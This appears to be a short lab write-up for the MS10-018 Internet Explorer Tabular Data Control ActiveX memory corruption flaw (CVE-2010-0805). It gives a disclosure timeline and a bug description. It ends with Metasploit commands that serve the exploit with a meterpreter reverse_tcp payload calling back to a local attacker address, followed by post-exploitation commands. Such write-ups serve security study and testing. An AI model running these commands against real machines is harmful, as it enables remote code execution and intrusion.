MS10-018 : Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption

Timeline :

Vulnerability privately disclosed to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB980182” provided the 2010-03-30
Metasploit PoC provided by jduck the 2010-04-05

PoC provided by :

Anonymous
jduck

Reference(s) :

CVE-2010-0805
MS10-018

Affected version(s) :

Internet Explorer 5
Internet Explorer 6

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the “DataURL” parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.

Commands :

use windows/browser/ms10_018_ie_tabular_acti­vex
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig